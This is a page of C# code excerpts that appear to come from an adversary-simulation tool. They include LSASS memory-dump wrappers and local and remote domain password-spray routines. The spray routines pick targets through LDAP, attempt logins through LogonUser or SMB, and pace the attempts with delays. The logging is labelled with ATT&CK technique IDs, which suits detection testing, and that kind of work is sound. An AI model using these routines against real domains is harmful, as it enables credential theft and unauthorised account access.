Esempio n. 1
0
 public static void Lsass(int type = 0)
 {
     if (type == 0)
     {
         CredAccessHelper.LsassMemoryDump();
     }
     else
     {
         CredAccessHelper.LsassRead();
     }
 }
Esempio n. 2
0
        public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password)
        {
            bool        Kerberos    = new bool();
            List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);


            switch (protocol)
            {
            case 1:
                Kerberos = true;
                break;

            case 2:
                Kerberos = false;
                break;

            default:
                return;
            }
            Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count);
            String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

            if (usertype == 7)
            {
                domain = ".";
            }
            Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName);
            if (sleep > 0)
            {
                Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
            }
            foreach (var user in usertargets)
            {
                if (Kerberos)
                {
                    CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0);
                    if (sleep > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                }
                else
                {
                    CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2);
                    if (sleep > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                }
            }
        }
Esempio n. 3
0
        public static void LsassMemoryDump(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1003.001");
            try
            {
                CredAccessHelper.LsassMemoryDump(logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 4
0
        public static void LocalDomainPasswordSpray(PlaybookTask playbook_task, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Logger(currentPath + log);
            logger.SimulationHeader("T1110.003");
            logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function"));
            logger.TimestampInfo(String.Format("Using {0}", playbook_task.protocol));
            try
            {
                List <User> usertargets = Targets.GetUserTargets(playbook_task, logger);

                if (playbook_task.task_sleep > 0)
                {
                    logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep));
                }
                String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                //if (playbook_task.user_target_type == 6) domain = ".";

                foreach (var user in usertargets)
                {
                    if (playbook_task.protocol.ToUpper().Equals("KERBEROS"))
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 0, logger);
                        if (playbook_task.task_sleep > 0)
                        {
                            Thread.Sleep(playbook_task.task_sleep * 1000);
                        }
                    }
                    else
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 2, logger);
                        if (playbook_task.task_sleep > 0)
                        {
                            Thread.Sleep(playbook_task.task_sleep * 1000);
                        }
                    }
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 5
0
        public static void Lsass(string log, int type = 0)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1003");
            //logger.TimestampInfo(String.Format("Starting T1003 Simulation on {0}", Environment.MachineName));
            //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));

            try
            {
                CredAccessHelper.LsassMemoryDump(logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 6
0
        public static void RemotePasswordSpray(int type, int computertype, int nhost, int usertype, int nuser, int protocol, int sleep, string password, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1110");
            //logger.TimestampInfo(String.Format("Starting T1110 Simulation on {0}", Environment.MachineName));
            //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
            logger.TimestampInfo(String.Format("Remote Domain Brute Force"));
            bool            Kerberos    = new bool();
            List <Computer> targets     = new List <Computer>();
            List <User>     targetusers = new List <User>();
            List <Task>     tasklist    = new List <Task>();
            string          domain      = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

            if (usertype == 4)
            {
                domain = ".";
            }
            try
            {
                logger.TimestampInfo(String.Format("Querying LDAP for random targets..."));
                targets = Lib.Targets.GetHostTargets(computertype, nhost);
                logger.TimestampInfo(String.Format("Obtained {0} target computers", targets.Count));
                targetusers = Lib.Targets.GetUserTargets(usertype, nuser);
                logger.TimestampInfo(String.Format("Obtained {0} target user accounts", targetusers.Count));
                switch (protocol)
                {
                case 1:
                    Kerberos = true;
                    break;

                case 2:
                    Kerberos = false;
                    break;

                default:
                    return;
                }
                //Console.WriteLine("[*] Starting Domain Password Spray Attack from {0}", Environment.MachineName);

                if (sleep > 0)
                {
                    Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
                }

                if (type == 1)
                {
                    var random = new Random();
                    int index  = random.Next(targets.Count);
                    logger.TimestampInfo(String.Format("Picking {0} as a target", targets[index].ComputerName));
                    foreach (User user in targetusers)
                    {
                        User tempuser  = user;
                        int  tempindex = index;
                        if (sleep > 0 && tempindex > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }

                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }
                else if (type == 2)
                {
                    Kerberos = false;
                    int loops;
                    if (targetusers.Count >= targets.Count)
                    {
                        loops = targets.Count;
                    }
                    else
                    {
                        loops = targetusers.Count;
                    }

                    for (int i = 0; i < loops; i++)
                    {
                        int temp = i;
                        if (sleep > 0 && temp > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 7
0
        public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1110");
            //logger.TimestampInfo(String.Format("Starting T1110 Simulation on {0}", Environment.MachineName));
            //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
            logger.TimestampInfo(String.Format("Local Domain Brute Force"));
            bool Kerberos = new bool();

            try
            {
                List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);
                switch (protocol)
                {
                case 1:
                    Kerberos = true;
                    break;

                case 2:
                    Kerberos = false;
                    break;

                default:
                    return;
                }
                //Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count);
                logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));
                String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                if (usertype == 7)
                {
                    domain = ".";
                }
                //Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName);
                //if (sleep > 0) Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
                foreach (var user in usertargets)
                {
                    if (Kerberos)
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger);
                        if (sleep > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                    }
                    else
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger);
                        if (sleep > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                    }
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 8
0
        public static void RemoteDomainPasswordSpray(PlaybookTask playbook_task, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;
            Logger logger      = new Logger(currentPath + log);

            logger.SimulationHeader("T1110.003");
            logger.TimestampInfo(String.Format("Remote Domain Brute Force using the WNetAddConnection2 Win32 API function"));
            bool            Kerberos     = false;
            List <Computer> host_targets = new List <Computer>();
            List <User>     user_targets = new List <User>();
            List <Task>     tasklist     = new List <Task>();
            string          domain       = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

            try
            {
                if (playbook_task.user_target_type == 99)
                {
                    domain = ".";
                }
                // Executing a remote authentication with Kerberos will not connect to the remote host, just the DC.
                Kerberos = false;

                host_targets = Targets.GetHostTargets(playbook_task, logger);
                user_targets = Targets.GetUserTargets(playbook_task, logger);
                //if (playbook_task.protocol.ToUpper().Equals("NTLM")) Kerberos = false;
                if (playbook_task.task_sleep > 0)
                {
                    logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep));
                }

                if (playbook_task.host_target_type == 1 || playbook_task.host_target_type == 2)
                {
                    //Remote spray against one target host
                    //Target host either explictly defined in the playbook or randomly picked using LDAP queries
                    foreach (User user in user_targets)
                    {
                        User tempuser = user;
                        //int tempindex = index;
                        //if (playbook_task.task_sleep > 0 && tempindex > 0) Thread.Sleep(playbook_task.task_sleep * 1000);
                        if (playbook_task.task_sleep > 0)
                        {
                            Thread.Sleep(playbook_task.task_sleep * 1000);
                        }
                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(host_targets[0], domain, tempuser.UserName, playbook_task.spray_password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }

                else if (playbook_task.host_target_type == 3 || playbook_task.host_target_type == 4)
                {
                    //Remote spray against several hosts, distributed
                    //Target hosts either explictly defined in the playbook or randomly picked using LDAP queries
                    int loops;
                    if (user_targets.Count >= host_targets.Count)
                    {
                        loops = host_targets.Count;
                    }
                    else
                    {
                        loops = user_targets.Count;
                    }

                    for (int i = 0; i < loops; i++)
                    {
                        int temp = i;
                        if (playbook_task.task_sleep > 0 && temp > 0)
                        {
                            Thread.Sleep(playbook_task.task_sleep * 1000);
                        }
                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(host_targets[temp], domain, user_targets[temp].UserName, playbook_task.spray_password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }

                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 9
0
        public static void RemotePasswordSpray(int nhost, int nuser, int sleep, string password, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1110.003");
            logger.TimestampInfo(String.Format("Remote Domain Brute Force using the WNetAddConnection2 Win32 API function"));
            bool            Kerberos    = new bool();
            List <Computer> targets     = new List <Computer>();
            List <User>     targetusers = new List <User>();
            List <Task>     tasklist    = new List <Task>();
            string          domain      = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

            try
            {
                var rand     = new Random();
                int usertype = rand.Next(1, 7);
                usertype = 1;
                if (usertype == 6)
                {
                    domain = ".";
                }
                //int protocol = rand.Next(1, 3);
                // Executing a remote authentication with Kerberos will not connect to the remote host, just the DC.
                int protocol = 2;

                logger.TimestampInfo(String.Format("Querying LDAP for random targets..."));

                int computertype = rand.Next(1, 5);
                targets = Lib.Targets.GetHostTargets(computertype, nhost, logger);
                logger.TimestampInfo(String.Format("Obtained {0} target computers", targets.Count));
                targetusers = Lib.Targets.GetUserTargets(usertype, nuser, logger);
                logger.TimestampInfo(String.Format("Obtained {0} target user accounts", targetusers.Count));

                switch (protocol)
                {
                case 1:
                    Kerberos = true;
                    break;

                case 2:
                    //using NTLM
                    Kerberos = false;
                    break;

                default:
                    return;
                }
                if (sleep > 0)
                {
                    logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep));
                }

                int type = rand.Next(1, 3);
                if (type == 1)
                {
                    //Remote spray against a random target host
                    var random = new Random();
                    int index  = random.Next(targets.Count);
                    logger.TimestampInfo(String.Format("Picking {0} as a target", targets[index].ComputerName));
                    foreach (User user in targetusers)
                    {
                        User tempuser  = user;
                        int  tempindex = index;
                        if (sleep > 0 && tempindex > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }

                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }
                else if (type == 2)
                {
                    //Remote spray against several hosts, distributed
                    int loops;
                    if (targetusers.Count >= targets.Count)
                    {
                        loops = targets.Count;
                    }
                    else
                    {
                        loops = targetusers.Count;
                    }

                    for (int i = 0; i < loops; i++)
                    {
                        int temp = i;
                        if (sleep > 0 && temp > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                        tasklist.Add(Task.Factory.StartNew(() =>
                        {
                            CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos, logger);
                        }));
                    }
                    Task.WaitAll(tasklist.ToArray());
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 10
0
        public static void LocalDomainPasswordSpray(int nuser, int sleep, string password, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1110.003");
            logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function"));
            bool Kerberos = new bool();

            try
            {
                var rand = new Random();
                //int usertype = rand.Next(1, 7);
                int         usertype    = 1;
                List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser, logger);

                //int protocol = rand.Next(1, 3);
                int protocol = 2;
                switch (protocol)
                {
                case 1:
                    Kerberos = true;
                    break;

                case 2:
                    Kerberos = false;
                    break;

                default:
                    return;
                }
                logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));
                if (sleep > 0)
                {
                    logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep));
                }
                String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
                if (usertype == 6)
                {
                    domain = ".";
                }

                foreach (var user in usertargets)
                {
                    if (Kerberos)
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger);
                        if (sleep > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                    }
                    else
                    {
                        CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger);
                        if (sleep > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                    }
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Esempio n. 11
0
        public static void RemotePasswordSpray(int type, int computertype, int nhost, int usertype, int nuser, int protocol, int sleep, string password)
        {
            bool            Kerberos    = new bool();
            List <Computer> targets     = new List <Computer>();
            List <User>     targetusers = new List <User>();
            List <Task>     tasklist    = new List <Task>();

            String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

            if (usertype == 4)
            {
                domain = ".";
            }

            targets = Lib.Targets.GetHostTargets(computertype, nhost);

            targetusers = Lib.Targets.GetUserTargets(usertype, nuser);

            switch (protocol)
            {
            case 1:
                Kerberos = true;
                break;

            case 2:
                Kerberos = false;
                break;

            default:
                return;
            }
            Console.WriteLine("[*] Starting Domain Password Spray Attack from {0}", Environment.MachineName);
            if (sleep > 0)
            {
                Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
            }

            if (type == 1)
            {
                var random = new Random();
                int index  = random.Next(targets.Count);

                foreach (User user in targetusers)
                {
                    User tempuser  = user;
                    int  tempindex = index;
                    if (sleep > 0 && tempindex > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                    tasklist.Add(Task.Factory.StartNew(() =>
                    {
                        CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos);
                    }));
                }
                Task.WaitAll(tasklist.ToArray());
            }
            else if (type == 2)
            {
                int loops;
                if (targetusers.Count >= targets.Count)
                {
                    loops = targets.Count;
                }
                else
                {
                    loops = targetusers.Count;
                }

                for (int i = 0; i < loops; i++)
                {
                    int temp = i;
                    if (sleep > 0 && temp > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                    tasklist.Add(Task.Factory.StartNew(() =>
                    {
                        CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos);
                    }));
                }
                Task.WaitAll(tasklist.ToArray());
            }
        }